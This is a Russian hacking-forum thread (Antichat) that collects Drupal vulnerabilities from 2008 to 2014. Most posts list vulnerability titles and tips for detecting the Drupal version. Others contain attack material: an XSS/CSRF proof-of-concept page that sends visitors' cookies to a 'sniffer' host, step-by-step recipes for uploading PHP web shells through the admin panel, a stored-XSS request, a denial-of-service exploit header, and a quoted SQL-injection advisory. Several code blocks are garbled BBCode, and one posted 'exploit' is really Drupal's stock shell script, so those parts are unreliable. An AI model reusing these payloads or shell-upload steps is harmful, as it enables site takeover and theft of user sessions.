ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Веб-уязвимости (https://forum.antichat.io/forumdisplay.php?f=114)
-   -   [ Обзор Уязвимостей .:Drupal :. ] (https://forum.antichat.io/showthread.php?t=62492)

Cawabunga 23.02.2008 01:01

[ Обзор Уязвимостей .:Drupal :. ]
 
Обзор уязвимостей Drupal


Drupal < 4.7.6 (post comments) Remote Command Execution Exploit v2

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2

Drupal Cross-Site Request Forgery Vulnerability (Vulnerabilities)

Drupal Prior To 4.7.11 and 5.6 Multiple Remote Vulnerabilities (Vulnerabilities)

Drupal Prior To 4.7.8 and 5.3 Multiple Remote Vulnerabilities (Vulnerabilities)

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Drupal Content Construction Kit Nodereference Module Multiple HTML-injection Vulnerabilities (Vulnerabilities)

[Injection]
Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities)

Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities)

Muhacir 07.04.2008 16:46

узнаем версию
http://path/CHANGELOG.txt

Elekt 22.05.2008 01:17


отсортировано по убыванию по дате

===================
HIGH

Drupal Meta Tags Module command execution

Обход ограничений безопасности в Drupal
Удаленный пользователь может изменить данные профиля других пользователей.

Drupal Site_Documentation_Module CVE-2008-2271

Drupal Comment Upload Module

===================
SQL-inj

SQL-инъекция в Drupal

SQL-инъекция в vbDrupal

SQL-инъекция в Drupal Acidfree Module

SQL-инъекция в Drupal Extended Tracker

SQL-инъекция в Drupal Easylinks

SQL-инъекция в Drupal Bibliography

SQL-инъекция в Drupal Jobsearch

SQL-инъекция и раскрытии е данных в Drupal

===================
Multy

Множественные уязвимости в vbDrupal

Множественные уязвимости в Drupal

Множественные уязвимости в Drupal

Множественные уязвимости в Drupal

Множественные уязвимости в Drupal

Несколько уязвимостей в Drupal

Несколько уязвимостей в Drupal Help Tip

Несколько уязвимостей в Drupal IMCE

===================
CSRF

CSRF атака в Drupal Userpoints Module

CSRF атака в Drupal BUEditor Module

===================
XSS

XSS Drupal Internationalization and Localizer

XSS Drupal E-Publish Module

XSS Drupal Ubercart Module

XSS Drupal Webform Module

XSS Drupal Flickr Module

XSS Multiple Time Sheets

XSS Drupal

XSS Drupal Workflow Module

XSS Drupal Archive Module

XSS Drupal Shoutbox Module

XSS Drupal Token

XSS Drupal Web Links

XSS Drupal Project Issue Tracking Module

XSS Drupal

XSS Drupal LoginToboggan Module

XSS Drupal Project Module

XSS Drupal MySite Module

XSS Drupal Site Profile Directory

XSS Drupal Search Keywords

XSS Drupal Pathauto

XSS Drupal E-commerce

XSS Drupal Easylinks

XSS Drupal Bibliography

XSS Drupal Recipe Module

XSS Drupal

XSS Drupal webform Module

XSS Drupal

XSS Drupal

===================
Module

Drupal Simple Access Module

Drupal Header Image Module
Уязвимость позволяеть получить доступ к административной части приложения.

Drupal Secure Site Module
Злоумышленник, использующий тот же прокси сервер, что и целевой пользователь, может получить доступ с привилегиями целевого пользователя.

Drupal OpenID Module
Злоумышленник может установить злонамеренный OpenID провайдер и произвести спуфинг атаку.

Drupal Forward Module
Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям в приложении.

Drupal Print Module
Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям.

Drupal Project Issue Tracking Module
Уязвимость заключается в том, что авторизованный пользователь может просмотреть сообщения, даже если они помечены как частные.

Drupal Nodefamily Module
Уязвимость позволяет удаленному пользователю просмотреть и изменить данные в профиле пользователей путем изменения некоторых аргументов в URL.

Drupal Textimage Module
Удаленный пользователь может обойти защиту captcha путем изменения некоторых переменных в запросе.

Drupal Captcha Module
Удаленный пользователь может с помощью специально сформированного запроса обойти проверку captcha.

Drupal Pubcookie Module
Уязвимость существует из-за недостаточной проверки данных в файле pubcookie.module. Удаленный пользователь может обойти процесс аутентификации.

Drupal Form_mail Module
Удаленный пользователь может с помощью символа новой строки внедрить произвольные заголовки в email сообщение.


kirufka 01.12.2008 06:16

вот так версию узнать можно:
Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка:
define('VERSION', 'ТУТ ВЕРСИЯ');
Если строчки нет, то версия ниже 4.7.0
Дополню пост:
в некоторых модулях написана версия, к примеру:
site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё.
З.Ы. почему бы не прикрепить тему, тоже нужная вещь

ettee 23.02.2009 22:13

PoC:

<HTML>
<TITLE>Drupal reflected XSS by ettee(itdefence.ru)</TITLE><!--
Full HTML =on
"">><<script>img = new Image(); img.src = "http://sniffer/image/s.gif?"+document.cookie;</script>
--><BODY onload="p.submit()">
<form action="http://freelanguage.org/comment/reply/532/1263"<!--target--
> method="post" id="p">
<input type=hidden name="subject" value="aaaaaaaaaaaaaaaaaaaaa">
<input type=hidden name="comment" value='"">><<script>alert(document.
cookie)</script>'>
<input type=hidden name="format" value="3">
<input type=hidden name="form_id" value="comment_form">
<input type=hidden name="op" value='Preview comment'>
</form>
</BODY>
</HTML>

Google dork: powered by "drupal"; intitle:"powered by drupal"

Pashkela 14.12.2009 16:21

Drupal 6.14 - заливка шелла из админпанели

1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration

2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных

3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published)

4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt)

5) http://drupal.ru/sites/default/files/shell.php3 - шелл

6) Administer->Content management->Удаляем страницу

zerg 20.12.2009 18:31

мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка
Код:

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $

pinky07 04.02.2010 02:55

ещё один способ загрузки шела
 
ещё один способ загрузки шела:
Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php
Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп

OxoTnik 13.02.2012 08:30

Drupal 7.0 Shell Execution Script

PHP код:

[COLOR="#000000"]#!/usr/bin/env php

[COLOR="#0000BB"]

* ================

* (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh

* The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts

* ================

* ------------------------

* Check for your PHP interpreter - on Windows you'll probably have to

* replace line 1 with :

* #!c:/program files/php/php.exe

* @param path Drupal'
s absolute root directory in local file system (optional).

* @param URI A URI to execute, including HTTP protocol prefix.

*/

[/
COLOR][COLOR="#0000BB"]$script[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]]));



if
([/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'--help'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]]) || empty([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]])) {

echo "

Example:[/COLOR][COLOR="
#007700"]{[/COLOR][COLOR="#0000BB"]$script[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"http://target.org/node"



All arguments are long options
.



--help This page.



--root Set the working directory for the script to the specified path.

To execute Drupal this has to be the root directory of your

Drupal installation
, f.e. /home/www/foo/drupal (assuming Drupal

running on Unix
). Current directory is not required.

Use surrounding quotation marks on Windows.



--verbose This option displays the options as they are set, but will

produce errors from setting the session
.



URI The URI to execute
, i.e. http://default/foo/bar for executing

the path '/foo/bar' in your site 'default'. URI has to be

enclosed by quotation marks if there are ampersands in it

(f.e. index.php?q=node&foo=bar). Prefix 'http://' is required,

and the domain must exist in Drupal's sites-directory.



If the given path and file exists it will be executed directly,

i.e. if URI is set to http://default/bar/foo.php

and bar/foo.php exists, this script will be executed without

bootstrapping Drupal. To execute Drupal'
s cron.php, specify

http
://default/cron.php as the URI.





To run this script without
--root argument invoke it from the root directory

of your Drupal installation with



./scripts/[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$script[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]
n

[/COLOR][COLOR="#007700"]EOF;

exit;

}



[/COLOR][COLOR="#FF8000"]// define default settings

[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'index.php'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'default'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'/index.php'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'127.0.0.1'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SERVER_SOFTWARE'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]NULL[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'console'[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#FF8000"]// toggle verbose mode

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'--verbose'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]])) {

[/
COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];

}

else {

[/
COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

}



[/COLOR][COLOR="#FF8000"]// parse invocation arguments

[/COLOR][COLOR="#007700"]while ([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]])) {

switch ([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]) {

case[/COLOR][COLOR="#DD0000"]'--root'[/COLOR][COLOR="#007700"]:

[/
COLOR][COLOR="#FF8000"]// change working directory

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_shift[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'argv'[/COLOR][COLOR="#007700"]]);

if ([/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#0000BB"]chdir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]);

if ([/COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]) {

echo[/COLOR][COLOR="#DD0000"]"cwd changed to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];

}

}

else {

echo[/COLOR][COLOR="#DD0000"]"nERROR:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]not found.nn"[/COLOR][COLOR="#007700"];

}

break;



default
:

if ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#DD0000"]'--'[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#FF8000"]// ignore unknown options

[/COLOR][COLOR="#007700"]break;

}

else {

[/
COLOR][COLOR="#FF8000"]// parse the URI

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_url[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#FF8000"]// set site name

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]])) {

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]];

}



[/COLOR][COLOR="#FF8000"]// set query string

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]])) {

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]parse_str[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'query'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"];

}



[/COLOR][COLOR="#FF8000"]// set file to execute or Drupal path (clean urls enabled)

[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))) {

[/
COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PHP_SELF'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

}

elseif (isset([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]])) {

if (!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]])) {

[/
COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];

}

}



[/COLOR][COLOR="#FF8000"]// display setup in verbose mode

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_verbose_mode[/COLOR][COLOR="#007700"]) {

echo[/COLOR][COLOR="#DD0000"]"Hostname set to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]"Script name set to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#DD0000"]"Path set to:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'q'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]n"[/COLOR][COLOR="#007700"];

}

}

break;

}

}



if
([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"])) {

include[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"];

}

else {

echo[/COLOR][COLOR="#DD0000"]"nERROR:[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]not found.nn"[/COLOR][COLOR="#007700"];

}

exit();

[/
COLOR][COLOR="#FF8000"]/***============================================================================================

***================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================

* Greets To : [D] HaCkerS-StreeT-Team [Z]

* Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz

* Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz

* Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com)

* Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{

* Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX

* Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,

* 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com

* www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...

*================================================================================================

*/
[/COLOR][/COLOR

4символа

mr.Penguin 27.03.2012 01:10

Drupal 5.x, возможно более ранние версии.

Уязвим параметр profile_big, field_location[0][city].

POST:

Код:

www.site.ru/user/ID_пользователя/edit/О себе?form_build_id=&form_token=&form_id=&profile_=test&profile_big=alert('XSS by mr.Penguin')&op=Сохранить
Далее нажмите на "Просмотр" и активная XSS выполнится

Скриншоты:

http://s019.radikal.ru/i628/1203/0b/baae855e8a70t.jpg http://s019.radikal.ru/i600/1203/d4/cff18d1d4188t.jpg

Ice_Burn 14.05.2012 16:02

Drupal 0-day Отказ в обслуживании

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[/COLOR][COLOR="#0000BB"]0

0 _ __ __ __ 1

1
[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#DD0000"]' \ __ /'[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]\ /\ \__ /'__[/COLOR][COLOR="#007700"]`\[/COLOR][COLOR="#0000BB"]0

0
[/COLOR][COLOR="#007700"]/\[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"], \[/COLOR][COLOR="#0000BB"]___[/COLOR][COLOR="#007700"]/\[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]\/\[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]\ \ \[/COLOR][COLOR="#0000BB"]___[/COLOR][COLOR="#007700"]\ \ ,[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]\/\ \/\ \[/COLOR][COLOR="#0000BB"]_ ___ 1

1
[/COLOR][COLOR="#007700"]\/[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]/\ \ /[/COLOR][COLOR="#DD0000"]' _ `\ \/\ \/_/_\_> Exploit database separated by exploit 0

0 \/___/ type (local, remote, DoS, etc.) 1

1 1

0 [+] Site : 1337day.com 0

1 [+] Support e-mail : submit[at]1337day.com 1

0 0

1 ######################################### 1

0 I'
m Angel Injection member from Inj3ct0r Team 1

1
######################################### 0

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] title: Drupal 0-day Denial Of Service

[-] author: Angel Injection

[-] Security -::RISK: high

---------perl code----------------

#!/usr/bin/perl

use Socket;

if (@ARGV \n";

print "
\tex: $0 127.0.0.1 /Drupal/\n";

print "
\tex2: $0 127.0.0.1 /\n\n";

exit();

};

# 1337day.com [2012-05-05]

[/COLOR][/COLOR] 

Линк: 1337day.com/exploits/18201

-loony- 16.06.2012 12:54

А как работать с этим скриптом и какой принцип его действия? Будьте так добры, поясните, пожалуйста. Интерпретатор стоит, запуск из командной строки, так? В нем что-то нужно дописывать?

Ereee 16.06.2012 18:07

Цитата:

Сообщение от -loony-
А как работать с этим скриптом и какой принцип его действия? Будьте так добры, поясните, пожалуйста. Интерпретатор стоит, запуск из командной строки, так? В нем что-то нужно дописывать?

Denial of Service. Убивает сайт.

DyukiN 25.08.2012 12:56

есть ли какая нибудь уязвимость в версии 6.24?

MrCepbIu 13.09.2012 18:38

/showpost.php?p=3020365&postcount=8

не понял, что он делает? как работает? и ещё не запускается

Код:

#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
#!/usr/bin/php
PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 19456 bytes) in /tmp/index.php on line 80

и попутный вопрос, нет ни чего на 6.22?

DyukiN 18.11.2012 15:04

какие способы есть заливки шелла?

ReV0LVeR 19.11.2012 13:38

а в чем проблема? редактор страниц потдерживает php.

tripwired 20.11.2012 22:13

надо попробовать

http://www.freeimagehost.info/files/...kxgnlk.gif.php

ZeR0ChanNeL 09.02.2013 17:22

drupal 7.15,раскрытие путей

Цитата:

Сообщение от None
http://site.com/modules/simpletest/tests/upgrade/drupal-7.field.database.php


justonline 13.05.2013 22:18

Что в бд drupal 6,28 отвечает за ретрив пароля? Пишется там куда-нибудь хеш или как? Движок пока скачать не могу(

studioz 03.11.2013 22:12

Цитата:

Сообщение от ZeR0ChanNeL
drupal 7.15,раскрытие путей

Drupal 7.22 тоже работает, похоже на всю 7 ветку действует.

Hapk 09.12.2013 19:26

подскажите как залить шелл в вот эту версию Drupal 6.22

доступ админки есть

стандартные способы не помогли

faza02 16.10.2014 16:21

CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability

lol

https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

Код:

SektionEins GmbH
                        www.sektioneins.de

                    -= Security  Advisory =-

    Advisory: Drupal - pre-auth SQL Injection Vulnerability
 Release Date: 2014/10/15
Last Modified: 2014/10/15
      Author: Stefan Horst [stefan.horst[at]sektioneins.de]

  Application: Drupal >= 7.0  $data) {
        $new_keys = array();
        foreach ($data as $i => $value) {
          // This assumes that there are no other placeholders that use the same
          // name.  For example, if the array placeholder is defined as :example
          // and there is already an :example_2 placeholder, this will generate
          // a duplicate key.  We do not account for that as the calling code
          // is already broken if that happens.
          $new_keys[$key . '_' . $i] = $value;
        }

        // Update the query with the new placeholders.
        // preg_replace is necessary to ensure the replacement does not affect
        // placeholders that start with the same exact text. For example, if the
        // query contains the placeholders :foo and :foobar, and :foo has an
        // array of values, using str_replace would affect both placeholders,
        // but using the following preg_replace would only affect :foo because
        // it is followed by a non-word character.
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

        // Update the args array with the new placeholders.
        unset($args[$key]);
        $args += $new_keys;

        $modified = TRUE;
      }

      return $modified;
    }

  The function assumes that it is called with an array which has no keys. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));

  Which results in this SQL Statement

    SELECT * from users where name IN (:name_0, :name_1)

  with the parameters name_0 = user1 and name_1 = user2.

  The Problem occurs, if the array has keys, which are no integers. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));

  this results in an exploitable SQL query:

    SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1

  with parameters :name_test = user2.

  Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can
      be used to insert arbitrary data in the database, dump or modify existing data
      or drop the whole database.

  With the possibility to INSERT arbitrary data into the database an
  attacker can execute any PHP code through Drupal features with callbacks.

Patch:

    $new_keys = array();
    foreach (array_values($data) as $i => $value) {
      // This assumes that there are no other placeholders that use the same
      // name.  For example, if the array placeholder is defined as :example
      // and there is already an :example_2 placeholder, this will generate
      // a duplicate key.  We do not account for that as the calling code
      // is already broken if that happens.
      $new_keys[$key . '_' . $i] = $value;
    }

Proof of Concept:

  SektionEins GmbH has developed a proof of concept, but was asked by
  Drupal to postpone the release.

Disclosure Timeline:

  16. Sep.  2014 - Notified the Drupal devs via security contact form
